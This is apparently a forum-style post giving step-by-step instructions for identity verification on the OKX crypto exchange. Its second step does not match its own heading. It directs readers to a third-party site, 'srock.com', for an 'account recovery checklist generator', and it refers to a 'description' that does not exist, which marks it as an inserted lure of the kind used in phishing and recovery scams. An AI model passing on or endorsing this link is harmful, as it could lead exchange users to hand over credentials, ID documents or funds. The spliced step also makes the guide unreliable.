I ran into this last week. Here's what fixed it for me. Verifying your identity on OKX can seem daunting, but it is a straightforward process. Here is how to do it step by step. Step 1. Create an account. Start by visiting the OKX website and signing up for an account. You will all need to provide your email address and create a password. Step 2. Log in and navigate to verification. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 3. Choose verification level. Select the appropriate verification level based on your needs. For most users, the basic level is sufficient. Step 4. Upload required documents. Prepare and upload the necessary documents such as a government-issued ID and a selfie. Ensure the documents are clear and legible. Make sure your ID is not expired, as this can lead to delays in the verification process. Step 5. Submit and wait for approval. After uploading your documents, submit your application. You will receive a notification once your identity is verified, which can take a few minutes to a few hours. Following these steps will help you verify your identity on OKX without any hassle. If you run into any issues, don't hesitate to reach out to the support team. Good luck!